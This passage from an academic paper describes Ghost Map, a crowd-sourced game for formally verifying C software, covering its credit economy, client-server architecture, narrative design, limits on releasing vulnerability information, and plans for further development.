finishing the operation on the server. In future releases of
the game, we plan to include additional game play activities
to manage the delay generated by edge removal processing.
Figure 5. The primary game screen for Ghost Map.

Figure 6. Action scenes from the Ghost Map game (figures 6a through 6d).

Ghost Map includes a simple game economy that penalizes expensive edge disconnect operations that do not succeed and rewards successful decisions. The player begins
with a certain amount of credit to solve the current level
(e.g., 1000 credits, shown in the top left of the screen, see
Figure 5). Every request for an edge disconnect costs a certain amount (e.g., 500 credits, see Figure 6b). If an edge request is unsuccessful, then the credits are consumed, the
players are notified of the failure and given chance to try
again. If the request is successful, however, then the player
receives the current value of the level, which will be 1000
minus the cost of any edge removal requests. MOPS is run
again on the updated CFG to determine if there are any remaining counter-examples. If there are, then gameplay continues immediately in a new level.
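The payout arithmetic described above can be summarized in a few lines. The credit values below are the examples from the text; the deployed game may use different numbers:

```python
# Sketch of the level economy using the example values from the text
# (the deployed game's exact rules and numbers may differ).
LEVEL_CREDIT = 1000      # starting value of a level
DISCONNECT_COST = 500    # cost of each edge disconnect request

def level_reward(num_requests):
    """Reward for winning a level after `num_requests` edge disconnect
    attempts: the level's starting value minus the cost of every
    request made (failed requests consume credits too)."""
    return LEVEL_CREDIT - num_requests * DISCONNECT_COST

# Succeeding on the first request leaves 500 credits as the reward;
assert level_reward(1) == 500
# one failed attempt followed by a success leaves 0.
assert level_reward(2) == 0
```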
V. GAME SYSTEM ARCHITECTURE
The high-level architecture of the Ghost Map game system is shown in Figure 7. The upper portion of the figure
shows the off-line processing of the CWE entry and the target software to generate game levels. The game level data
and modified C software are loaded into the cloud to be used
during game play. Ghost Map is a client-server game. The
game clients run the Unity game engine and communicate
with the Ghost Map Game Server to receive game levels
and to send edge removal requests for verification by the
math back end.

Figure 7. The Ghost Map game system architecture.
VI. GAME DESIGN ISSUES
The goal of our game is to allow players to perform refinements based on insights gleaned from a visual analysis
of the CFG and an understanding of the FSA. The intent is
that the actions performed by the players are, on the whole,
more efficient than the brute force search abilities of computers. In the game play, one or more FSA to CFG matches
are identified and displayed to the player.
Within Ghost Map, we chose to use a visual representation that is directly tied to the graphical nature of an FSA
and CFG, and to use operations that are directly tied to the
acts of cleaving and refinement. During our early design
phase, we explored several alternative visualizations that
used analogies (e.g., building layouts, mazes, an “upper”
world/CFG linked to a “lower” world/FSA, a Tron-like inner world/FSA linked to a “real” outer world/CFG) but preliminary testing with game players revealed that the simpler
node-based CFG/FSA visualizations were easier to understand. We instead focused our game design efforts on developing an appealing narrative basis for the game, using
visually appealing graphics to display the graphs and motivating the player’s interest in performing the refinement operations efficiently via a game economy. Efficient gameplay was a must. While cleaving is an inexpensive operation, verifying edge removal can be quite expensive to compute.
A. Narrative Basis for Game
Creating an effective game is often an exercise in creating an effective narrative. However, in a crowd-sourced
game, there is an additional complication – the narrative basis of the game needs to encourage the player to want to
solve the specific problems with which they are presented.
Most successful crowd-sourced games to date have actually
used a minimal narrative approach. The “story” of the game
is the real-life story of the problem being solved (e.g., trying
to analyze proteins in FoldIt). In our case, we decided early
on that a story based on trying to formally verify software
would be too technical and unappealing to the masses. In
addition, due to the vulnerability protection issue, there are
some limitations to the information that we can release
about the true story.
Hence, in our early design, we explored a variety of narratives that could be used to motivate the gameplay through
analogy. In particular, we wanted the analogy to motivate
the specific refinement operations of cleaving and edge removal. We considered several basic approaches for the narrative, each focused on a different type of game reason for
eliminating a counter-example from a graphical layout of
some sort:
• Having the player focus on circumventing
restrictions. For instance, finding out how to solve
traps and challenges within an ancient tomb in
order to reach the treasure inside.
• Having the player protect others. For instance,
having little lemmings moving along the graph and
needing to eliminate the counter-examples in order
to stop them from dying when they hit the counterexamples.
• Having the player focus on protecting a system.
For instance, being a security officer and trying to
shut down doorways that enable entities from
an alternate universe to enter our own and
wreak destruction.
• Having the player try to outwit others to survive.
For instance, in a Pac-man style gameplay, solving
the counter-example provides you with immunity
from the enemy (e.g., ghosts) chasing you.
• Having the player try to escape. For instance,
the player is stuck in a maze and the only way out
is to solve the counter-example.
• Having the player stop something from escaping.
For instance, a sentient program is trying to escape
and take over the world, and the player needs to
keep it from growing too strong by eliminating its
access points to the outside world.
These narrative motivations and ideas were tested with
game players to determine their appeal. The last two were
found to be the most appealing, and upon further thought,
we blended the two within the concept of a newly formed
sentient program trying to ensure its growth and survival
by eliminating restrictions on its capabilities. This final
narrative idea tested well, and added the motivation of an
implicit journey of self-realization. An additional benefit of
this final narrative idea was that the graph being analyzed
by the players could be clearly described as a program that
needed to be analyzed. Thus, in keeping with some of the
successful approaches mentioned above, we came almost
full circle to linking gameplay closely with the specific real-world task.
B. Software and Vulnerabilities
One of the design requirements of Ghost Map is that the association between a game level and the associated portion of
source code being proved correct cannot be known to the
crowd. This requirement relates to standard practices for
limiting the release of potential software vulnerability information. While Ghost Map is a tool for proving the correctness of software, it is of course true that when correctness proofs fail, vulnerabilities may be present. Even partial
information about vulnerabilities in software should be
managed carefully, with release to the public to be considered only after the software authors or other authorized parties have been informed. Ghost Map protects the software
to be verified by only showing the player a compacted control flow graph of the software and by similarly limiting
knowledge of the vulnerabilities in question.
Games like FoldIt [6] and Ghost Map draw players that
want their game efforts to be applied toward the common
good. Detailed information about the problem being solved
by the game can provide additional player motivation.
Ghost Map however cannot take full advantage of this additional motivation approach, due to the restrictions on the release of potential vulnerability information.
VII. FUTURE PLANS
Ghost Map is under active development, and at the time
of writing we have just commenced our second phase of development. Our goal is to build upon the success of our initial version in six ways:
• Enhance the gameplay through the use of refinement guidance, which we refer to as “clues”
• Add new game play activities that provide additional fun for the player
• Develop a new space-travel narrative that provides a more engaging story than the current narrative and also provides a more comprehensive linkage to the puzzle problem
• Improve the accuracy and performance of our edge removal verification tool
• Extend the scope of the Ghost Map system to cover additional C language constructs
• Improve our approach to FSAs to create a more accurate representation of vulnerabilities
VIII. SUMMARY AND CONCLUSIONS
We have presented Ghost Map, a novel crowd-sourced
game that allows non-experts to help prove software free of common security vulnerabilities. Ghost Map
was released for open Internet play in December 2013. In
the months since release, over a thousand users have played
the game and similar numbers of small proofs have been
completed (representative data from January 2014 is shown
in Figure 8). Ghost Map demonstrates the basic feasibility
of using games to generate proofs and provides a new approach to performing refinement for model-checking approaches. In addition to the immediate benefits of verifying
software using games, we also anticipate that the Ghost Map
approach may enable new automated methods as well.
Through the intermediate representations we have developed and the proof tools we have created for validating edge
removals, we believe the possibility of creating novel intelligent refinement algorithms is significant.
Figure 8. Ghost Map player and proof data from January 2014.
ACKNOWLEDGMENT
Many additional people beyond the named authors on
this paper contributed to Ghost Map, including Bob Emerson, David Diller, David Mandelberg, Daniel McCarthy,
John Orthofer, Paul Rubel, Michelle Spina and Ray Tomlinson at BBN, and additional individuals at the subcontractors
(Breakaway Games, Carnegie Mellon University and the
University of Central Florida). The DARPA leadership and
staff associated with the Crowd Sourced Formal Verification (CSFV) Program were also very helpful. Dr. Drew
Dean developed the initial CSFV concept at DARPA and
Dr. Daniel Ragsdale is the current Program Manager. Mr.
Carl Thomas at AFRL is the project funding agent.
This material is based on research sponsored by DARPA under contract number FA8750-12-C-0204. The U.S. Government is authorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright notation thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of DARPA or the U.S. Government.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6